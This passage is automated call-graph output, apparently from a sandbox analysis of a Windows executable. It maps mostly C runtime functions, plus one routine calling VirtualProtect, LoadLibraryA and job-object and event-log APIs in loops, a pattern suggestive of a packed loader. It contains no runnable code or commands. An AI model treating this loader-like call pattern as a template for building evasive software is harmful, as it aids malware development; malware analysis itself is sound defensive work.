9044->9045 9057 40dc21 9044->9057 9047 40db22 9045->9047 9045->9057 9050 40bb24 __decode_pointer 6 API calls 9046->9050 9063 40dba9 9046->9063 9051 40baa9 __encode_pointer 7 API calls 9047->9051 9048 40bb24 __decode_pointer 6 API calls 9048->9057 9049 40bb24 __decode_pointer 6 API calls 9060 40dbec 9049->9060 9052 40db9c 9050->9052 9053 40db28 GetProcAddress 9051->9053 9054 40bb24 __decode_pointer 6 API calls 9052->9054 9055 40baa9 __encode_pointer 7 API calls 9053->9055 9054->9063 9056 40db3d GetProcAddress 9055->9056 9058 40baa9 __encode_pointer 7 API calls 9056->9058 9057->8957 9059 40db52 GetProcAddress 9058->9059 9061 40baa9 __encode_pointer 7 API calls 9059->9061 9062 40bb24 __decode_pointer 6 API calls 9060->9062 9066 40dbd4 9060->9066 9064 40db67 9061->9064 9062->9066 9063->9049 9063->9066 9064->9046 9065 40db71 GetProcAddress 9064->9065 9067 40baa9 __encode_pointer 7 API calls 9065->9067 9066->9048 9067->9046 9069 40b08c __VEC_memzero 9068->9069 9069->9018 9071 40dacd 9070->9071 9072 40dacf IsDebuggerPresent 9070->9072 9071->9022 9078 40fe79 9072->9078 9075 41177a SetUnhandledExceptionFilter UnhandledExceptionFilter 9076 411797 __invoke_watson 9075->9076 9077 41179f GetCurrentProcess TerminateProcess 9075->9077 9076->9077 9077->9022 9078->9075 9080 406c25 GetProcAddress 9079->9080 9081 406c35 ExitProcess 9079->9081 9080->9081 9083 40630d 9082->9083 9089 40626c 9082->9089 9084 40854f _malloc 6 API calls 9083->9084 9085 406313 9084->9085 9087 40747b __openfile 67 API calls 9085->9087 9086 408507 __FF_MSGBANNER 67 API calls 9093 40627d 9086->9093 9088 406305 9087->9088 9088->8995 9089->9088 9092 4062c9 RtlAllocateHeap 9089->9092 9089->9093 9095 4062f9 9089->9095 9096 40854f _malloc 6 API calls 9089->9096 9098 4062fe 9089->9098 9100 40620b 9089->9100 9091 40835c __NMSG_WRITE 67 API calls 9091->9093 9092->9089 9093->9086 9093->9089 9093->9091 9094 406c3c _doexit 3 API calls 9093->9094 9094->9093 9097 40747b __openfile 67 API calls 9095->9097 9096->9089 9097->9098 9099 40747b __openfile 67 API calls 9098->9099 9099->9088 9101 406217 _fprintf 9100->9101 9102 406248 _fprintf 9101->9102 9103 407670 __lock 68 API calls 9101->9103 9102->9089 9104 40622d 9103->9104 9105 407e82 ___sbh_alloc_block 5 API calls 9104->9105 9106 406238 9105->9106 9108 406251 9106->9108 9111 407596 LeaveCriticalSection 9108->9111 9110 406258 9110->9102 9111->9110 9112->9000 9114 407a30 HeapAlloc 9113->9114 9115 4079fc HeapReAlloc 9113->9115 9116 407a1a 9114->9116 9118 407a53 VirtualAlloc 9114->9118 9115->9116 9117 407a1e 9115->9117 9116->8862 9117->9114 9118->9116 9119 407a6d HeapFree 9118->9119 9119->9116 9121 407ab0 VirtualAlloc 9120->9121 9123 407af7 9121->9123 9123->8866 9124->8869 9125->8802 9144 407596 LeaveCriticalSection 9126->9144 9128 40bca7 9128->8812 9130 40ef53 InterlockedIncrement 9129->9130 9131 40ef56 9129->9131 9130->9131 9132 40ef60 InterlockedIncrement 9131->9132 9133 40ef63 9131->9133 9132->9133 9134 40ef70 9133->9134 9135 40ef6d InterlockedIncrement 9133->9135 9136 40ef7a InterlockedIncrement 9134->9136 9137 40ef7d 9134->9137 9135->9134 9136->9137 9138 40ef96 InterlockedIncrement 9137->9138 9139 40efa6 InterlockedIncrement 9137->9139 9140 40efb1 InterlockedIncrement 9137->9140 9138->9137 9139->9137 9140->8815 9145 407596 LeaveCriticalSection 9141->9145 9143 40bcf5 9143->8817 9144->9128 9145->9143 9146->8669 9148 411303 9147->9148 9149 4112fc 9147->9149 9150 40747b __openfile 68 API calls 9148->9150 9149->9148 9153 41132f 9149->9153 9155 411308 9150->9155 9151 409867 __openfile 6 API calls 9152 411317 9151->9152 9152->8700 9153->9152 9154 40747b __openfile 68 API calls 9153->9154 9154->9155 9155->9151 9157 40c1d6 9156->9157 9158 40baa9 __encode_pointer 7 API calls 9157->9158 9159 40c1ee 9157->9159 9158->9157 9159->8708 9163 40c131 9160->9163 9162 40c17a 9162->8710 9164 40c13d _fprintf 9163->9164 9171 406c54 9164->9171 9170 40c15e _fprintf 9170->9162 9172 407670 __lock 68 API calls 9171->9172 9173 406c5b 9172->9173 9174 40c046 9173->9174 9175 40bb24 __decode_pointer 6 API calls 9174->9175 9176 40c05a 9175->9176 9177 40bb24 __decode_pointer 6 API calls 9176->9177 9178 40c06a 9177->9178 9187 40c0ed 9178->9187 9194 411089 9178->9194 9180 40baa9 __encode_pointer 7 API calls 9182 40c0e2 9180->9182 9181 40c088 9183 40c0ac 9181->9183 9190 40c0d4 9181->9190 9207 40d708 9181->9207 9184 40baa9 __encode_pointer 7 API calls 9182->9184 9186 40d708 __realloc_crt 74 API calls 9183->9186 9183->9187 9188 40c0c2 9183->9188 9184->9187 9186->9188 9191 40c167 9187->9191 9188->9187 9189 40baa9 __encode_pointer 7 API calls 9188->9189 9189->9190 9190->9180 9256 406c5d 9191->9256 9195 411095 _fprintf 9194->9195 9196 4110c2 9195->9196 9197 4110a5 9195->9197 9198 411103 HeapSize 9196->9198 9201 407670 __lock 68 API calls 9196->9201 9199 40747b __openfile 68 API calls 9197->9199 9203 4110ba _fprintf 9198->9203 9200 4110aa 9199->9200 9202 409867 __openfile 6 API calls 9200->9202 9204 4110d2 ___sbh_find_block 9201->9204 9202->9203 9203->9181 9212 411123 9204->9212 9210 40d711 9207->9210 9209 40d750 9209->9183 9210->9209 9211 40d731 Sleep 9210->9211 9216 411492 9210->9216 9211->9210 9215 407596 LeaveCriticalSection 9212->9215 9214 4110fe 9214->9198 9214->9203 9215->9214 9217 41149e _fprintf 9216->9217 9218 4114b3 9217->9218 9219 4114a5 9217->9219 9221 4114c6 9218->9221 9222 4114ba 9218->9222 9220 40625a _malloc 68 API calls 9219->9220 9224 4114ad __dosmaperr _fprintf 9220->9224 9229 411638 9221->9229 9250 4114d3 ___sbh_resize_block _realloc ___sbh_find_block 9221->9250 9223 40617d __getstream 68 API calls 9222->9223 9223->9224 9224->9210 9225 41166b 9228 40854f _malloc 6 API calls 9225->9228 9226 41163d HeapReAlloc 9226->9224 9226->9229 9227 407670 __lock 68 API calls 9227->9250 9230 411671 9228->9230 9229->9225 9229->9226 9231 41168f 9229->9231 9233 40854f _malloc 6 API calls 9229->9233 9235 411685 9229->9235 9232 40747b __openfile 68 API calls 9230->9232 9231->9224 9234 40747b __openfile 68 API calls 9231->9234 9232->9224 9233->9229 9236 411698 GetLastError 9234->9236 9238 40747b __openfile 68 API calls 9235->9238 9236->9224 9240 411606 9238->9240 9239 41155e HeapAlloc 9239->9250 9240->9224 9241 41160b GetLastError 9240->9241 9241->9224 9242 4115b3 HeapReAlloc 9242->9250 9243 407e82 ___sbh_alloc_block 5 API calls 9243->9250 9244 41161e 9244->9224 9246 40747b __openfile 68 API calls 9244->9246 9245 40854f _malloc 6 API calls 9245->9250 9247 41162b 9246->9247 9247->9224 9247->9236 9248 411601 9249 40747b __openfile 68 API calls 9248->9249 9249->9240 9250->9224 9250->9225 9250->9227 9250->9239 9250->9242 9250->9243 9250->9244 9250->9245 9250->9248 9251 4076d3 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 9250->9251 9252 4115d6 9250->9252 9251->9250 9255 407596 LeaveCriticalSection 9252->9255 9254 4115dd 9254->9250 9255->9254 9259 407596 LeaveCriticalSection 9256->9259 9258 406c64 9258->9170 9259->9258 9261 404ed3 __write_nolock 9260->9261 9262 404ef8 GetModuleHandleW LocalAlloc 9261->9262 9384 40650a 9261->9384 9382 404e1c GetProcAddress VirtualProtect 9262->9382 9265 404f2b 9267 404f6b 9265->9267 9268 404f56 CreateJobObjectA 9265->9268 9266 404eea 9270 406e58 68 API calls 9266->9270 9269 404f79 7 API calls 9267->9269 9271 405001 9267->9271 9268->9265 9269->9267 9270->9262 9272 405003 GetLastError 9271->9272 9273 40578f GetSystemDefaultLCID 9271->9273 9274 4057aa 9271->9274 9272->9271 9272->9273 9273->9271 9273->9274 9387 404d37 9274->9387 9276 4057b9 9277 4057af 9276->9277 9277->9276 9278 4057d3 FindActCtxSectionStringW 9277->9278 9279 4057e7 9277->9279 9278->9277 9280 405804 11 API calls 9279->9280 9281 405891 9279->9281 9280->9279 9383 404b4d LoadLibraryA 9281->9383 9283 405896 9283->8626 9283->8751 9285 406713 _fprintf 9284->9285 9286 406726 9285->9286 9287 406752 9285->9287 9288 40747b __openfile 68 API calls 9286->9288 9705 408f70 9287->9705 9290 40672b 9288->9290 9292 409867 __openfile 6 API calls 9290->9292 9298 40673b _fprintf 9292->9298 9293 4067d5 9295 406801 9293->9295 9717 4099e3 9293->9717 9748 406819 9295->9748 9298->8719 9302 40747b __openfile 68 API calls 9305 4067c5 9302->9305 9306 409867 __openfile 6 API calls 9305->9306 9306->9293 9308 40664e _fprintf 9307->9308 9309 406679 _puts 9308->9309 9310 40665c 9308->9310 9909 408fb1 9309->9909 9311 40747b __openfile 68 API calls 9310->9311 9312 406661 9311->9312 9314 409867 __openfile 6 API calls 9312->9314 9316 406671 _fprintf 9314->9316 9315 40668b _puts 9317 4099e3 __stbuf 68 API calls 9315->9317 9316->8725 9318 40669d _puts 9317->9318 9319 409b59 __output_l 104 API calls 9318->9319 9320 4066b5 _puts 9319->9320 9321 409a7f __ftbuf 102 API calls 9320->9321 9322 4066c6 9321->9322 9914 4066de 9322->9914 9325 40661a 9324->9325 9326 4065ff 9324->9326 9924 40652b 9325->9924 9327 40747b __openfile 68 API calls 9326->9327 9329 406604 9327->9329 9331 409867 __openfile 6 API calls 9329->9331 9330 40662a 9332 405f50 9330->9332 9333 40747b __openfile 68 API calls 9330->9333 9331->9332 9334 4064ae 9332->9334 9333->9332 9335 4064ba _fprintf 9334->9335 9336 4064c1 9335->9336 9337 4064ca 9335->9337 10230 4063d4 9336->10230 9339 408f70 __lock_file 69 API calls 9337->9339 9340 4064d2 9339->9340 10240 40638c 9340->10240 9343 4064c7 _fprintf 9343->8729 9348 406b3f _fprintf 9345->9348 9346 406b4d 9347 40747b __openfile 68 API calls 9346->9347 9350 406b52 9347->9350 9348->9346 9349 406b7b 9348->9349 9351 408f70 __lock_file 69 API calls 9349->9351 9352 409867 __openfile 6 API calls 9350->9352 9353 406b83 9351->9353 9357 406b62 _fprintf 9352->9357 10286 406aa9 9353->10286 9357->8731 10347 406060 9358->10347 9360 404b41 9361 40694a 9360->9361 9363 406956 _puts _fprintf 9361->9363 9362 40696a 9364 40747b __openfile 68 API calls 9362->9364 9363->9362 9366 4069f4 _puts 9363->9366 9368 408d86 __fileno 68 API calls 9363->9368 9365 40696f 9364->9365 9367 409867 __openfile 6 API calls 9365->9367 9369 408fb1 _puts 69 API calls 9366->9369 9370 40697f _fprintf 9367->9370 9372 40699d 9368->9372 9371 406a04 _puts 9369->9371 9370->8735 9373 4099e3 __stbuf 68 API calls 9371->9373 9372->9362 9372->9366 9374 406a17 _puts _strlen 9373->9374 10407 40b5c9 9374->10407 9376 406a4a _puts 9377 409a7f __ftbuf 102 API calls 9376->9377 9378 406a7f 9377->9378 10440 406a96 9378->10440 9380 406a37 _puts 9380->9376 10419 40b465 9380->10419 9382->9265 9383->9283 9392 409304 9384->9392 9388 404d44 __write_nolock 9387->9388 9389 404d70 9 API calls 9388->9389 9391 404dfd 9388->9391 9698 404bb7 9388->9698 9389->9388 9391->9277 9393 40931d 9392->9393 9396 4090d5 9393->9396 9408 40904e 9396->9408 9398 4090fc 9399 40747b __openfile 68 API calls 9398->9399 9401 409101 9399->9401 9402 409867 __openfile 6 API calls 9401->9402 9405 40651b 9402->9405 9403 409139 9407 40917e 9403->9407 9416 40f111 9403->9416 9405->9266 9406 40747b __openfile 68 API calls 9406->9405 9407->9405 9407->9406 9409 409061 9408->9409 9413 4090ae 9408->9413 9423 40bd70 9409->9423 9411 40908e 9411->9413 9443 40e92f 9411->9443 9413->9398 9413->9403 9417 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9416->9417 9418 40f125 9417->9418 9419 40f132 9418->9419 9631 40e00f 9418->9631 9419->9403 9424 40bcf7 __getptd_noexit 68 API calls 9423->9424 9425 40bd78 9424->9425 9426 409066 9425->9426 9427 406be8 __amsg_exit 68 API calls 9425->9427 9426->9411 9428 40f09b 9426->9428 9427->9426 9429 40f0a7 _fprintf 9428->9429 9430 40bd70 __getptd 68 API calls 9429->9430 9431 40f0ac 9430->9431 9432 40f0da 9431->9432 9433 40f0be 9431->9433 9434 407670 __lock 68 API calls 9432->9434 9435 40bd70 __getptd 68 API calls 9433->9435 9436 40f0e1 9434->9436 9438 40f0c3 9435->9438 9459 40f05d 9436->9459 9441 40f0d1 _fprintf 9438->9441 9442 406be8 __amsg_exit 68 API calls 9438->9442 9441->9411 9442->9441 9444 40e93b _fprintf 9443->9444 9445 40bd70 __getptd 68 API calls 9444->9445 9446 40e940 9445->9446 9447 407670 __lock 68 API calls 9446->9447 9448 40e952 9446->9448 9449 40e970 9447->9449 9450 40e960 _fprintf 9448->9450 9452 406be8 __amsg_exit 68 API calls 9448->9452 9451 40e9b9 9449->9451 9454 40e9a1 InterlockedIncrement 9449->9454 9455 40e987 InterlockedDecrement 9449->9455 9450->9413 9627 40e9ca 9451->9627 9452->9450 9454->9451 9455->9454 9456 40e992 9455->9456 9456->9454 9457 40617d __getstream 68 API calls 9456->9457 9458 40e9a0 9457->9458 9458->9454 9460 40f061 9459->9460 9466 40f093 9459->9466 9461 40ef35 ___addlocaleref 8 API calls 9460->9461 9460->9466 9462 40f074 9461->9462 9462->9466 9470 40efc4 9462->9470 9467 40f105 9466->9467 9626 407596 LeaveCriticalSection 9467->9626 9469 40f10c 9469->9438 9471 40efd5 InterlockedDecrement 9470->9471 9472 40f058 9470->9472 9473 40efea InterlockedDecrement 9471->9473 9474 40efed 9471->9474 9472->9466 9484 40edec 9472->9484 9473->9474 9475 40eff7 InterlockedDecrement 9474->9475 9476 40effa 9474->9476 9475->9476 9477 40f004 InterlockedDecrement 9476->9477 9478 40f007 9476->9478 9477->9478 9479 40f011 InterlockedDecrement 9478->9479 9481 40f014 9478->9481 9479->9481 9480 40f02d InterlockedDecrement 9480->9481 9481->9480 9482 40f03d InterlockedDecrement 9481->9482 9483 40f048 InterlockedDecrement 9481->9483 9482->9481 9483->9472 9485 40ee03 9484->9485 9486 40ee70 9484->9486 9485->9486 9491 40ee37 9485->9491 9500 40617d __getstream 68 API calls 9485->9500 9487 40617d __getstream 68 API calls 9486->9487 9488 40eebd 9486->9488 9489 40ee91 9487->9489 9496 40eee4 9488->9496 9538 411ed8 9488->9538 9492 40617d __getstream 68 API calls 9489->9492 9493 40ee58 9491->9493 9504 40617d __getstream 68 API calls 9491->9504 9495 40eea4 9492->9495 9497 40617d __getstream 68 API calls 9493->9497 9503 40617d __getstream 68 API calls 9495->9503 9498 40ef29 9496->9498 9510 40617d 68 API calls __getstream 9496->9510 9505 40ee65 9497->9505 9501 40617d __getstream 68 API calls 9498->9501 9499 40617d __getstream 68 API calls 9499->9496 9502 40ee2c 9500->9502 9506 40ef2f 9501->9506 9514 4120b2 9502->9514 9508 40eeb2 9503->9508 9509 40ee4d 9504->9509 9511 40617d __getstream 68 API calls 9505->9511 9506->9466 9512 40617d __getstream 68 API calls 9508->9512 9530 41206d 9509->9530 9510->9496 9511->9486 9512->9488 9515 4120bf 9514->9515 9529 41213c 9514->9529 9516 40617d __getstream 68 API calls 9515->9516 9518 4120d0 9515->9518 9516->9518 9517 4120e2 9520 4120f4 9517->9520 9521 40617d __getstream 68 API calls 9517->9521 9518->9517 9519 40617d __getstream 68 API calls 9518->9519 9519->9517 9522 412106 9520->9522 9523 40617d __getstream 68 API calls 9520->9523 9521->9520 9524 412118 9522->9524 9525 40617d __getstream 68 API calls 9522->9525 9523->9522 9526 41212a 9524->9526 9527 40617d __getstream 68 API calls 9524->9527 9525->9524 9528 40617d __getstream 68 API calls 9526->9528 9526->9529 9527->9526 9528->9529 9529->9491 9531 41207a 9530->9531 9532 4120ae 9530->9532 9533 41208a 9531->9533 9534 40617d __getstream 68 API calls 9531->9534 9532->9493 9535 41209c 9533->9535 9536 40617d __getstream 68 API calls 9533->9536 9534->9533 9535->9532 9537 40617d __getstream 68 API calls 9535->9537 9536->9535 9537->9532 9539 411ee9 9538->9539 9540 40eedd 9538->9540 9541 40617d __getstream 68 API calls 9539->9541 9540->9499 9542 411ef1 9541->9542 9543 40617d __getstream 68 API calls 9542->9543 9544 411ef9 9543->9544 9545 40617d __getstream 68 API calls 9544->9545 9546 411f01 9545->9546 9547 40617d __getstream 68 API calls 9546->9547 9548 411f09 9547->9548 9549 40617d __getstream 68 API calls 9548->9549 9550 411f11 9549->9550 9551 40617d __getstream 68 API calls 9550->9551 9552 411f19 9551->9552 9553 40617d __getstream 68 API calls 9552->9553 9554 411f20 9553->9554 9555 40617d __getstream 68 API calls 9554->9555 9556 411f28 9555->9556 9557 40617d __getstream 68 API calls 9556->9557 9558 411f30 9557->9558 9559 40617d __getstream 68 API calls 9558->9559 9560 411f38 9559->9560 9561 40617d __getstream 68 API calls 9560->9561 9562 411f40 9561->9562 9563 40617d __getstream 68 API calls 9562->9563 9564 411f48 9563->9564 9565 40617d __getstream 68 API calls 9564->9565 9566 411f50 9565->9566 9567 40617d __getstream 68 API calls 9566->9567 9568 411f58 9567->9568 9569 40617d __getstream 68 API calls 9568->9569 9570 411f60 9569->9570 9571 40617d __getstream 68 API calls 9570->9571 9572 411f68 9571->9572 9573 40617d __getstream 68 API calls 9572->9573 9574 411f73 9573->9574 9575 40617d __getstream 68 API calls 9574->9575 9576 411f7b 9575->9576 9577 40617d __getstream 68 API calls 9576->9577 9578 411f83 9577->9578 9579 40617d __getstream 68 API calls 9578->9579 9580 411f8b 9579->9580 9581 40617d __getstream 68 API calls 9580->9581 9582 411f93 9581->9582 9583 40617d __getstream 68 API calls 9582->9583 9584 411f9b 9583->9584 9585 40617d __getstream 68 API calls 9584->9585 9586 411fa3 9585->9586 9587 40617d __getstream 68 API calls 9586->9587 9588 411fab 9587->9588 9589 40617d __getstream 68 API calls 9588->9589 9590 411fb3 9589->9590 9591 40617d __getstream 68 API calls 9590->9591 9592 411fbb 9591->9592 9593 40617d __getstream 68 API calls 9592->9593 9594 411fc3 9593->9594 9595 40617d __getstream 68 API calls 9594->9595 9596 411fcb 9595->9596 9597 40617d __getstream 68 API calls 9596->9597 9598 411fd3 9597->9598 9599 40617d __getstream 68 API calls 9598->9599 9600 411fdb 9599->9600 9601 40617d __getstream 68 API calls 9600->9601 9602 411fe3 9601->9602 9603 40617d __getstream 68 API calls 9602->9603 9604 411feb 9603->9604 9605 40617d __getstream 68 API calls 9604->9605 9606 411ff9 9605->9606 9607 40617d __getstream 68 API calls 9606->9607 9608 412004 9607->9608 9609 40617d __getstream 68 API calls 9608->9609 9610 41200f 9609->9610 9611 40617d __getstream 68 API calls 9610->9611 9612 41201a 9611->9612 9613 40617d __getstream 68 API calls 9612->9613 9614 412025 9613->9614 9615 40617d __getstream 68 API calls 9614->9615 9616 412030 9615->9616 9617 40617d __getstream 68 API calls 9616->9617 9618 41203b 9617->9618 9619 40617d __getstream 68 API calls 9618->9619 9620 412046 9619->9620 9621 40617d __getstream 68 API calls 9620->9621 9622 412051 9621->9622 9623 40617d __getstream 68 API calls 9622->9623 9624 41205c 9623->9624 9625 40617d __getstream 68 API calls 9624->9625 9625->9540 9626->9469 9630 407596 LeaveCriticalSection 9627->9630 9629 40e9d1 9629->9448 9630->9629 9632 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9631->9632 9633 40e022 9632->9633 9634 411e96 9633->9634 9635 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9634->9635 9636 411ea9 9635->9636 9639 411cdc 9636->9639 9640 411d28 9639->9640 9641 411cfd GetStringTypeW 9639->9641 9642 411e0f 9640->9642 9643 411d15 9640->9643 9641->9643 9644 411d1d GetLastError 9641->9644 9667 4134ed GetLocaleInfoA 9642->9667 9645 411d61 MultiByteToWideChar 9643->9645 9662 411e09 9643->9662 9644->9640 9651 411d8e 9645->9651 9645->9662 9648 40dac5 __invoke_watson 5 API calls 9649 411e94 9648->9649 9649->9419 9650 411e60 GetStringTypeA 9654 411e7b 9650->9654 9650->9662 9655 411da3 _memset __crtGetStringTypeA_stat 9651->9655 9656 40625a _malloc 68 API calls 9651->9656 9653 411ddc MultiByteToWideChar 9658 411e03 9653->9658 9659 411df2 GetStringTypeW 9653->9659 9660 40617d __getstream 68 API calls 9654->9660 9655->9653 9655->9662 9656->9655 9663 4112cb 9658->9663 9659->9658 9660->9662 9662->9648 9664 4112d7 9663->9664 9665 4112e8 9663->9665 9664->9665 9666 40617d __getstream 68 API calls 9664->9666 9665->9662 9666->9665 9668 413520 9667->9668 9669 41351b 9667->9669 9670 40650a ___ansicp 91 API calls 9668->9670 9671 40dac5 __invoke_watson 5 API calls 9669->9671 9670->9669 9672 411e33 9671->9672 9672->9650 9672->9662 9673 413536 9672->9673 9674 413576 GetCPInfo 9673->9674 9678 413600 9673->9678 9675 4135eb MultiByteToWideChar 9674->9675 9676 41358d 9674->9676 9675->9678 9682 4135a6 _strlen 9675->9682 9676->9675 9679 413593 GetCPInfo 9676->9679 9677 40dac5 __invoke_watson 5 API calls 9680 411e54 9677->9680 9678->9677 9679->9675 9681 4135a0 9679->9681 9680->9650 9680->9662 9681->9675 9681->9682 9683 40625a _malloc 68 API calls 9682->9683 9684 4135d8 _memset __crtGetStringTypeA_stat 9682->9684 9683->9684 9684->9678 9685 413635 MultiByteToWideChar 9684->9685 9686 41364d 9685->9686 9687 41366c 9685->9687 9688 413671 9686->9688 9689 413654 WideCharToMultiByte 9686->9689 9690 4112cb __freea 68 API calls 9687->9690 9691 413690 9688->9691 9692 41367c WideCharToMultiByte 9688->9692 9689->9687 9690->9678 9693 40d6bc __calloc_crt 68 API calls 9691->9693 9692->9687 9692->9691 9694 413698 9693->9694 9694->9687 9695 4136a1 WideCharToMultiByte 9694->9695 9695->9687 9696 4136b3 9695->9696 9697 40617d __getstream 68 API calls 9696->9697 9697->9687 9699 404bef 9698->9699 9700 404bff BackupEventLogW 9699->9700 9701 404c07 9699->9701 9700->9701 9702 404c93 GetLastError 9701->9702 9703 404cab WaitNamedPipeW AssignProcessToJobObject GetFullPathNameW 9701->9703 9704 404d25 9701->9704 9702->9701 9703->9701 9704->9388 9706 408f82 9705->9706 9707 408fa4 EnterCriticalSection 9705->9707 9706->9707 9708 408f8a 9706->9708 9710 40675b 9707->9710 9709 407670 __lock 68 API calls 9708->9709 9709->9710 9710->9293 9711 408d86 9710->9711 9712 40676b 9711->9712 9713 408d95 9711->9713 9712->9293 9712->9302 9714 40747b __openfile 68 API calls 9713->9714 9715 408d9a 9714->9715 9716 409867 __openfile 6 API calls 9715->9716 9716->9712 9718 408d86 __fileno 68 API calls 9717->9718 9719 4099f2 9718->9719 9751 40e05a 9719->9751 9721 4067e7 9724 409b59 9721->9724 9722 4099f8 _puts 9722->9721 9723 40d677 __malloc_crt 68 API calls 9722->9723 9723->9721 9725 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 9724->9725 9726 409bc0 9725->9726 9727 409bc4 9726->9727 9730 408d86 __fileno 68 API calls 9726->9730 9741 409c05 __output_l __aulldvrm _strlen 9726->9741 9728 40747b __openfile 68 API calls 9727->9728 9729 409bc9 9728->9729 9731 409867 __openfile 6 API calls 9729->9731 9730->9741 9732 409bdb 9731->9732 9733 40dac5 __invoke_watson 5 API calls 9732->9733 9734 4067f7 9733->9734 9744 409a7f 9734->9744 9735 40e00f __isleadbyte_l 78 API calls 9735->9741 9736 409ab3 102 API calls _write_multi_char 9736->9741 9737 40617d __getstream 68 API calls 9737->9741 9738 40bb24 6 API calls __decode_pointer 9738->9741 9739 410127 80 API calls __cftof 9739->9741 9740 40d677 __malloc_crt 68 API calls 9740->9741 9741->9727 9741->9732 9741->9735 9741->9736 9741->9737 9741->9738 9741->9739 9741->9740 9742 409ae6 102 API calls _write_multi_char 9741->9742 9743 409b0c 102 API calls _write_string 9741->9743 9742->9741 9743->9741 9745 409a8a 9744->9745 9746 409a9d 9744->9746 9745->9746 9760 406324 9745->9760 9746->9295 9902 408fe3 9748->9902 9750 406821 9750->9298 9752 40e067 9751->9752 9754 40e076 9751->9754 9753 40747b __openfile 68 API calls 9752->9753 9755 40e06c 9753->9755 9756 40e09a 9754->9756 9757 40747b __openfile 68 API calls 9754->9757 9755->9722 9756->9722 9758 40e08a 9757->9758 9759 409867 __openfile 6 API calls 9758->9759 9759->9756 9761 40635f 9760->9761 9762 40633d 9760->9762 9761->9746 9762->9761 9763 408d86 __fileno 68 API calls 9762->9763 9764 406358 9763->9764 9766 408caa 9764->9766 9767 408cb6 _fprintf 9766->9767 9768 408cd9 9767->9768 9769 408cbe 9767->9769 9771 408ce7 9768->9771 9775 408d28 9768->9775 9791 40748e 9769->9791 9772 40748e __close 68 API calls 9771->9772 9774 408cec 9772->9774 9777 40747b __openfile 68 API calls 9774->9777 9794 40e409 9775->9794 9776 40747b __openfile 68 API calls 9784 408ccb _fprintf 9776->9784 9779 408cf3 9777->9779 9781 409867 __openfile 6 API calls 9779->9781 9780 408d2e 9782 408d51 9780->9782 9783 408d3b 9780->9783 9781->9784 9786 40747b __openfile 68 API calls 9782->9786 9804 408577 9783->9804 9784->9761 9787 408d56 9786->9787 9789 40748e __close 68 API calls 9787->9789 9788 408d49 9863 408d7c 9788->9863 9789->9788 9792 40bcf7 __getptd_noexit 68 API calls 9791->9792 9793 407493 9792->9793 9793->9776 9795 40e415 _fprintf 9794->9795 9796 40e470 9795->9796 9799 407670 __lock 68 API calls 9795->9799 9797 40e492 _fprintf 9796->9797 9798 40e475 EnterCriticalSection 9796->9798 9797->9780 9798->9797 9800 40e441 9799->9800 9802 40c782 __getstream InitializeCriticalSectionAndSpinCount 9800->9802 9803 40e458 9800->9803 9802->9803 9866 40e4a0 9803->9866 9805 408586 __write_nolock 9804->9805 9806 4085b8 9805->9806 9807 4085df 9805->9807 9837 4085ad 9805->9837 9809 40748e __close 68 API calls 9806->9809 9810 408647 9807->9810 9811 408621 9807->9811 9808 40dac5 __invoke_watson 5 API calls 9812 408ca8 9808->9812 9813 4085bd 9809->9813 9815 40865b 9810->9815 9870 40e0be 9810->9870 9814 40748e __close 68 API calls 9811->9814 9812->9788 9816 40747b __openfile 68 API calls 9813->9816 9817 408626 9814->9817 9820 40e05a __flsbuf 68 API calls 9815->9820 9819 4085c4 9816->9819 9821 40747b __openfile 68 API calls 9817->9821 9822 409867 __openfile 6 API calls 9819->9822 9823 408666 9820->9823 9824 40862f 9821->9824 9822->9837 9825 40890c 9823->9825 9827 40bd70 __getptd 68 API calls 9823->9827 9826 409867 __openfile 6 API calls 9824->9826 9828 408bdb WriteFile 9825->9828 9829 40891c 9825->9829 9826->9837 9831 408681 GetConsoleMode 9827->9831 9832 4088ee 9828->9832 9833 408c0e GetLastError 9828->9833 9830 4089fa 9829->9830 9852 408930 9829->9852 9850 408ada 9830->9850 9855 408a09 9830->9855 9831->9825 9835 4086ac 9831->9835 9834 408c59 9832->9834 9832->9837 9839 408c2c 9832->9839 9833->9832 9834->9837 9838 40747b __openfile 68 API calls 9834->9838 9835->9825 9836 4086be GetConsoleCP 9835->9836 9836->9832 9861 4086e1 9836->9861 9837->9808 9841 408c7c 9838->9841 9843 408c37 9839->9843 9844 408c4b 9839->9844 9840 40899e WriteFile 9840->9833 9840->9852 9848 40748e __close 68 API calls 9841->9848 9842 408b40 WideCharToMultiByte 9842->9833 9845 408b77 WriteFile 9842->9845 9849 40747b __openfile 68 API calls 9843->9849 9883 4074a1 9844->9883 9845->9850 9851 408bae GetLastError 9845->9851 9846 408a7e WriteFile 9846->9833 9846->9855 9848->9837 9853 408c3c 9849->9853 9850->9832 9850->9834 9850->9842 9850->9845 9851->9850 9852->9832 9852->9834 9852->9840 9854 40748e __close 68 API calls 9853->9854 9854->9837 9855->9832 9855->9834 9855->9846 9857 40dff5 80 API calls __fassign 9857->9861 9858 40878d WideCharToMultiByte 9858->9832 9859 4087be WriteFile 9858->9859 9859->9833 9859->9861 9860 40de19 11 API calls __putwch_nolock 9860->9861 9861->9832 9861->9833 9861->9857 9861->9858 9861->9860 9862 408812 WriteFile 9861->9862 9880 40e047 9861->9880 9862->9833 9862->9861 9901 40e4a9 LeaveCriticalSection 9863->9901 9865 408d84 9865->9784 9869 407596 LeaveCriticalSection 9866->9869 9868 40e4a7 9868->9796 9869->9868 9888 40e392 9870->9888 9872 40e0dc 9873 40e0e4 9872->9873 9874 40e0f5 SetFilePointer 9872->9874 9875 40747b __openfile 68 API calls 9873->9875 9876 40e10d GetLastError 9874->9876 9877 40e0e9 9874->9877 9875->9877 9876->9877 9878 40e117 9876->9878 9877->9815 9879 4074a1 __dosmaperr 68 API calls 9878->9879 9879->9877 9881 40e00f __isleadbyte_l 78 API calls 9880->9881 9882 40e056 9881->9882 9882->9861 9884 40748e __close 68 API calls 9883->9884 9885 4074ac __dosmaperr 9884->9885 9886 40747b __openfile 68 API calls 9885->9886 9887 4074bf 9886->9887 9887->9837 9889 40e3b7 9888->9889 9890 40e39f 9888->9890 9892 40748e __close 68 API calls 9889->9892 9900 40e3fc 9889->9900 9891 40748e __close 68 API calls 9890->9891 9893 40e3a4 9891->9893 9894 40e3e5 9892->9894 9895 40747b __openfile 68 API calls 9893->9895 9897 40747b __openfile 68 API calls 9894->9897 9896 40e3ac 9895->9896 9896->9872 9898 40e3ec 9897->9898 9899 409867 __openfile 6 API 